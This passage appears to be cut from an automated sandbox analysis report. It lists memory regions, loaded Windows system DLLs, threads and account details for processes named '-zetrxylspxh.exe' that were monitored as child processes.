"c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5793 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5794 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5861 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5862 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5863 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5864 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5865 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5866 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5867 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5868 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5869 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5870 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5871 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5872 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5873 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5875 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5879 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5880 start_va = 0x930000 end_va = 0xab7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 5881 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 177 os_tid = 0x11ac Thread: id = 200 os_tid = 0x11c4 Thread: id = 211 os_tid = 0x820 Process: id = "58" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xbd84000" os_pid = "0x780" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5906 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5907 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5908 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5909 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5910 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5911 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5912 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5913 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5914 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5915 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 5916 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5917 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5918 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5919 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5920 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5921 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 5938 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5939 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5940 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5941 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5942 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5943 start_va = 0x540000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5944 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5961 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6028 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6029 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6030 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6031 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6032 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6033 start_va = 0x540000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 6034 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6035 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 6036 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6037 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6038 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 6039 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6040 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6041 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6042 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6043 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6044 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6045 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6046 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6047 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6155 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6156 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6157 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 6158 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 6159 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 6160 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6161 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 6162 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6163 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 6164 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 213 os_tid = 0x4b0 Thread: id = 219 os_tid = 0xa30 Process: id = "59" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x46d89000" os_pid = "0x514" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5922 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5923 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5924 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5925 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5926 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5927 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5928 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5929 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5930 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5931 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 5932 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5933 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5934 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5935 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5936 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5937 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 5978 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5979 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5980 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5981 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5982 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5983 start_va = 0x620000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 5984 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5985 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6091 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6092 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6093 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6094 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6095 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6096 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 6097 start_va = 0x620000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 6098 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 6099 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6100 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6101 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 6102 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6103 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6104 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6105 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6106 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6107 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6108 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6109 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6110 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6111 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6112 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6113 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 6114 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 6115 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 6208 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6209 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = 